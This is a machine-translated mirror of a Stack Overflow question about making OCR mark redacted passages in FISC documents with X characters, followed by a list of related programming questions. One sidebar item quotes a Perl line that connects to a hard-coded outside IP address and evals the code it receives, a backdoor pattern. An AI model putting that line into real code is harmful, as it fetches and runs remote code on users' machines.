unicode - 教 OCR 理解 NSA 和 FISC 修订-6ren

unicode - 教 OCR 理解 NSA 和 FISC 修订

转载作者：行者123 更新时间：2023-12-01 06:32:18

26

4

我正在维护来自外国情报监视法庭的大量编辑文件的文件。

它们带有大段文本，如下所示:

screenshot of redacted text

当 OCR 尝试处理此问题时，您会收到如下文本:

production of this data on a daily basis for a period of 90 days. The sole purpose of this

production is to obtain foreign intelligence information in support of

individual authorized investigations to protect against international terrorism and

所以在 OCRed 版本中，有黑点的地方，只是缺少单词。有时，缺失的单词会创建一个具有不同/奇怪含义的语法正确的句子(如上)。其他时候，由此产生的句子毫无意义，但无论哪种方式都是一个问题。如果 OCR 引擎可以为这些点返回 X 或 Unicode 方块(如 ▮▮▮▮)，那就更好了。

我想要的结果是这样的:

production of this data on a daily basis for a period of 90 days. The sole purpose of this

production is to obtain foreign intelligence information in support of XXXXXXXXXXX

individual authorized investigations to protect against international terrorism and

我的问题是如何获得这些 X。有没有办法分析图像以识别黑点？有没有办法用 X 或一些更好的 unicode 字符替换它们？我愿意接受任何想法以使这看起来正确，但图像编辑对我来说不是强项，也不是在 OCR 引擎中深入进行黑客攻击。

最佳答案

您可能想为那些长 Blob 训练 Tesseract。根据 blob 的长度，您可以分配不同数量的“X”字符。阅读 TrainingTesseract3用于训练过程。

关于unicode - 教 OCR 理解 NSA 和 FISC 修订，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/18860940/

26

4

0

文章推荐： java - Hazelcast 执行速度较慢

文章推荐： python - 连接/连接/合并两个缺失一列的数据框

文章推荐： angularjs - Angular jsonp 返回状态代码 0 而不是 401

文章推荐： iis - ColdFusion 10 更新 11 404 处理程序未触发

haskell - 理解 (>>=) 。 (>>=)
我试图理解 (>>=).(>>=) ，GHCi 告诉我的是: (>>=) :: Monad m => m a -> (a -> m b) -> m b (>>=).(>>=) :: Mon
Java，理解
关于此 Java 代码，我有以下问题: public static void main(String[] args) { int A = 12, B = 24; int x = A,
Javascript 理解
对于这个社区来说，这可能是一个愚蠢的基本问题，但如果有人能向我解释一下，我会非常满意，我对此感到非常困惑。我在网上找到了这个教程，这是一个例子。 function sports (x){
Python语法/理解
def counting_sort(array, maxval): """in-place counting sort""" m = maxval + 1 count = [0
sorting - 理解 assembly
我有一些排序算法的集合，我想弄清楚它究竟是如何运作的。我对一些说明有些困惑，特别是 cmp 和 jle 说明，所以我正在寻求帮助。此程序集对包含三个元素的数组进行排序。 0.00 :
PHP:理解 $this - 调用基类方法而不是子方法
阅读 PHP.net 文档时，我偶然发现了一个扭曲了我理解 $this 的方式的问题: class C { public function speak_child() { //
image-processing - 理解
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。想改善这个问题吗？更新问题，使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
warnings - 理解 pragma
我有几个关于 pragmas 的相关问题.让我开始这一系列问题的原因是试图确定是否可以禁用某些警告而不用一直到 no worries。 (我还是想担心，至少有点担心!)。我仍然对那个特定问题的答案感兴
Lua - 理解 setmetatable
我正在尝试构建 CNN使用 Torch 7 .我对 Lua 很陌生.我试图关注这个 link .我遇到了一个叫做 setmetatable 的东西在以下代码块中: setmetatable(train
Perl - 理解 "botstrap"
我有这段代码 use lib do{eval&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"}; 这似乎导入了一个库，但
Haskell 中的函数——理解
我有以下代码，它给出了 [2,4,6] : j :: [Int] j = ((\f x -> map x) (\y -> y + 3) (\z -> 2*z)) [1,2,3] 为什么？似乎只使用了“
haskell - 理解 (.) 的类型签名
我刚刚使用 Richard Bird 的书学习 Haskell 和函数式编程，并遇到了 (.) 函数的类型签名。即 (.) :: (b -> c) -> (a -> b) -> (a -> c) 和相
scala - 理解 `andThen`
我遇到了andThen ，但没有正确理解它。为了进一步了解它，我阅读了 Function1.andThen文档 def andThen[A](g: (R) ⇒ A): (T1) ⇒ A mm是 Mu
JavaScript .call 理解
这是一个代码，用作 XMLHttpRequest 的 URL 的附加内容。URL 中显示的内容是: http://something/something.aspx?QueryString_from_b
javascript - 理解 Promise.all
考虑以下我从 https://stackoverflow.com/a/28250704/460084 获取的代码 function getExample() { var a = promise
Scala:理解::: 运算符
将 list1::: list2 运算符应用于两个列表是否相当于将 list1 的所有内容附加到 list2 ？ scala> val a = List(1,2,3) a: List[Int] = L
Dart map 理解
在python中我会写: {a:0 for a in range(5)} 得到 {0: 0, 1: 0, 2: 0, 3: 0, 4: 0} 我怎样才能在 Dart 中达到同样的效果？到目前为止，我
javascript - 理解 setTimeout
关闭。这个问题需要多问focused 。目前不接受答案。想要改进此问题吗？更新问题，使其仅关注一个问题 editing this post . 已关闭 5 年前。 Improve this ques
makefile - 理解 Makefile
我有以下 make 文件: CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 -W -Wall -Wno-unused -Wno-multichar
Haskell 理解 fmap
有人可以帮助或指导我如何理解以下实现中的 fmap 函数吗？ data Rose a = a :> [Rose a] deriving (Eq, Show) instance Functor Rose

首页

博学

6Ren·AI

商城

unicode - 教 OCR 理解 NSA 和 FISC 修订